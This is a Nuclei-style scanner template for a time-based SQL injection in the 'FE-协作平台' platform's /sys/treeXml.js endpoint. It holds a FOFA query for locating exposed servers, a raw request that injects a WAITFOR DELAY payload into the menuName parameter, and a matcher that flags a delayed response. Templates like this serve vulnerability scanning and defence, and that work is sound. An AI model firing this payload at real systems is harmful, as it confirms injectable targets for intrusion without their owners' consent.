id: FQHL-FE-treeXml-SQL

info:
  name: FQHL-FE-treeXml-SQL
  author: lengmo
  severity: high
  description: FQHL-FE-treeXml-SQL
  tags: sqli
  metadata:
    fofa-qeury: app="FE-协作平台"
    veified: true
    max-request: 1

http:
  - raw:
      - |
        GET /sys/treeXml.js%70?menuName=1';WAITFOR+DELAY+'0:0:5'--&type=function HTTP/1.1 
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close


               
    matchers:     
      - type: dsl
        dsl:
          - "status_code == 200 && duration>=5 && duration<=10 && contains(header,'text/xml')" 